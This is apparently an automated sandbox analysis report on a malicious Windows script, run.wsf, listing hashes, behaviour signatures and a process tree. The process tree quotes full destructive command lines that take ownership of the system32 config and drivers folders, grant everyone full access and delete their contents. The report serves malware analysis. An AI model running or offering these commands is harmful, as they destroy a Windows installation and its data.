Analysis

  • max time kernel
    54s
  • max time network
    38s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-08-2024 21:19

General

  • Target

    run.wsf

  • Size

    1KB

  • MD5

    99fe84c9ee9bc7854959c3165e316326

  • SHA1

    1571568802ba5b5673786920c59e78affd569104

  • SHA256

    bc6bad8cc9c846a3496955805bcfab7d1df5e12a8c60fa266c526a3051c99745

  • SHA512

    8e626408da6547162fd5fa03c6d2965b584a0149729348c292d4ec7da84194f1688bd5342b30321bfdc9264566a9ed11262f5b44a9ba4d22ba57eaedd824f7e1

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.wsf"
    1⤵
      PID:1256
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:4868
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.vbs"
        1⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3324
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4712
          • C:\Windows\system32\takeown.exe
            takeown /f c:\windows\system32\config\*
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:3660
          • C:\Windows\system32\icacls.exe
            icacls c:\windows\system32\config\* /grant everyone:(f)
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2160
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1788
          • C:\Windows\system32\takeown.exe
            takeown /f c:\windows\system32\drivers\*
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:5004
          • C:\Windows\system32\icacls.exe
            icacls c:\windows\system32\drivers\* /grant everyone:(f)
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:4892
      • C:\Windows\System32\Notepad.exe
        "C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\GetUninstall.vbs
        1⤵
        • Opens file in notepad (likely ransom note)
        PID:4956
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\RestartBackup.vbs"
        1⤵
          PID:5052
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\SaveUnpublish.vbs"
          1⤵
            PID:3768

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\Desktop\DebugStep.vbs

            Filesize

            57B

            MD5

            0fd6fb32bda4ebd6d5f4695335b1ad36

            SHA1

            5bf718741d02e633316ced147dbcf9d4d31e4200

            SHA256

            73a3849e7141aac5569d2493129b00f6b833c7c16d87470c0557386b20215c8c

            SHA512

            fde517c0ff84560900c86f37a4c33208862092902d83d2d6028b870bad6bb14fe139ea7fa2fa6e21da8cd29ed2bf2a5410eaf45e094882f72cdfde27d4a38696